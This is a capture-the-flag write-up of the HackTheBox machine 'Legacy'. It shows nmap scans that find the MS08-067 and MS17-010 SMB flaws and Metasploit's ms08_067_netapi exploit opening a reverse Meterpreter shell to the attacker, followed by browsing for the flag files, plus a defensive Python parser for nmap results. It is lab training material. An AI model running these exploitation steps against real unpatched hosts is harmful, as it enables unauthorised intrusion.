HackTheBox WriteUp: Legacy
This is the second HackTheBox machine I tackled.
It was my first Windows machine.
1. Reconnaissance
Scanning with nmap
This time, in addition to the usual scan, I also ran a targeted scan against a single port.
kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ sudo nmap -sS -sV -A -p 1-20000 -T5 10.10.10.4
[sudo] kali のパスワード:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:04 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 19997 filtered ports
PORT     STATE  SERVICE        VERSION
139/tcp  open   netbios-ssn    Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds   Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h29m03s, deviation: 2h07m16s, median: -5h59m03s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:52:0b (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-06-17T12:08:26+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   155.75 ms 10.10.14.1
2   156.03 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds

Targeted scan against port 445:

kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ cat nmap_445.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 19:24 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.17s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 51.73 seconds
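The host-script block above is the part a defender wants to triage automatically: two smb-vuln-* scripts report VULNERABLE and smb-security-mode reports signing disabled. The parser below is an added example, not part of this writeup; it turns nmap's host-script output into structured findings, the sample input is a constructed excerpt of the scan shown above, and the function names are my own. It handles the whole block shape, including one-line scripts and the reference URLs, not only the two hits.

```python
import re
# Constructed excerpt modelled on the nmap host-script output shown in this writeup.
SAMPLE = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# A script header is "| name:" or "|_name:"; indented continuation lines do not match.
HEADER_RE = re.compile(r"^\|[ _]([\w-]+):\s*(.*)$")

def parse_host_scripts(text):
    """Parse an nmap 'Host script results' block into {script: {key: value, 'cves': [...]}}."""
    findings, cur = {}, None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = findings[m.group(1)] = {"cves": []}
            if m.group(2):                # one-line result such as "false" or an NT_STATUS code
                cur["result"] = m.group(2).strip()
            continue
        if cur is None or not line.startswith("|") or ":" not in line:
            continue
        key, _, value = line.lstrip("|_ ").partition(":")
        key, value = key.strip(), value.strip()
        if key == "IDs":
            cur["cves"] += re.findall(r"CVE-\d{4}-\d+", value)
        elif value and not key.startswith("http"):   # skip bare markers ("VULNERABLE:") and URLs
            cur[key] = value
    return findings

def triage(text):
    """(script, cves, risk) for every script whose State is VULNERABLE, HIGH risk first."""
    hits = [(name, f["cves"], f.get("Risk factor", ""))
            for name, f in parse_host_scripts(text).items() if f.get("State") == "VULNERABLE"]
    return sorted(hits, key=lambda h: h[2] != "HIGH")

def smb_signing_disabled(text):
    """True when smb-security-mode reports message signing disabled (SMB relay exposure)."""
    mode = parse_host_scripts(text).get("smb-security-mode", {})
    return mode.get("message_signing", "").startswith("disabled")
```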
Having found the MS08-067 vulnerability, I attempted to get in with Metasploit.
2. Gaining access
I attempted to get in using the following Metasploit module.
kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ msfconsole
[!] The following modules were loaded with warnings:
[!]     /usr/share/metasploit-framework/modules/exploits/19671.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.

Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!

       =[ metasploit v5.0.85-dev                          ]
+ -- --=[ 2003 exploits - 1093 auxiliary - 342 post       ]
+ -- --=[ 560 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your module, why not try the reload command

msf5 > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.4:445 - The target is vulnerable.
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.20:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.4:1029) at 2020-06-19 19:31:14 -0400

meterpreter >
The attack succeeded and I was in.
3. Exploration
root.txt was right there in the directory I landed in.
I explored the other directories too and found user.txt a little later; that completes the box.
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > cd
Usage: cd directory
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > cd ..
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 02:07:20 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 02:07:20 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 02:07:21 -0400  ntuser.ini

meterpreter > cd ..
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 01:33:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 01:33:41 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 01:33:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  32    fil   2017-03-16 02:19:32 -0400  user.txt

meterpreter >
That's all.